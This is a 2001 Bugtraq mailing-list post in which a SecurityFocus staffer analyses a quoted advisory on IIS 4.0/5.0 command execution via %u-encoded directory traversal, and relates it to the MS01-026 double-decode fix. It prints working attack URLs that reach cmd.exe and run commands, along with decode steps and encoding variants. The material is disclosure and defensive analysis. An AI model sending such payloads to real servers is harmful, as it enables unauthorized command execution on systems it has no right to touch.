OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Dave Ahmad (dasecurityfocus.com)
Date: Wed Sep 19 2001 - 14:50:02 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    This seems to be just be another way to exploit the double decode
    vulnerability (Bugtraq ID 2708). There is a possibility that it may be a
    new issue due to the use of '%u' method of encoding. It does not look
    that way to us.

    On our test machines (and at eEye), systems do not seem to be vulnerable
    after applying the MS01-026 hotfix (or the MS01-044 patch).

    Ryan Permeh of eEye Digital Security provided a breakdown of an encoded
    attack string:

    The attack string used successfully against an IIS server (Win2K, SP2):

    http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c
    +dir+c:\

    first decode sequence(it replaces %u0025 with %)
    http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

    second decode sequence (it replaces %u005c with /)
    http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\

    The double decode vulnerability is fixed in MS01-026. I believe the fix
    is included in the cumulative patch released with MS01-044.

    It doesn't look like a new vulnerability, but we are awaiting confirmation
    from Microsoft.

    Has anyone managed to exploit a patched system?

    Thanks Ryan & eEye.

    Regards,

    Dave Ahmad
    Security Focus
    www.securityfocus.com

    On Wed, 19 Sep 2001, ALife // BERG wrote:

    > -----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
    >
    > Remote users can execute any command on several
    > IIS 4.0 and 5.0 systems by using UTF codes
    >
    > -------------------------------------[ security.instock.ru ]--------------
    >
    > Topic: Remote users can execute any command on several
    > IIS 4.0 and 5.0 systems by using UTF codes
    >
    > Announced: 2001-09-19
    > Credits: ALife <buginfoinbox.ru>
    > Affects: Microsoft IIS 4.0/5.0
    >
    > --------------------------------------------------------------------------
    >
    > ---[ Description
    >
    > For example, target has a virtual executable directory (e.g.
    > "scripts") that is located on the same driver of Windows system.
    > Submit request like this:
    >
    > http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
    >
    > Directory list of C:\ will be revealed.
    >
    > Of course, same effect can be achieved by this kind of processing
    > to '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c",
    > "..%u0025%u005c" ...
    >
    > Note: Attacker can run commands of IUSR_machinename account privilege
    > only.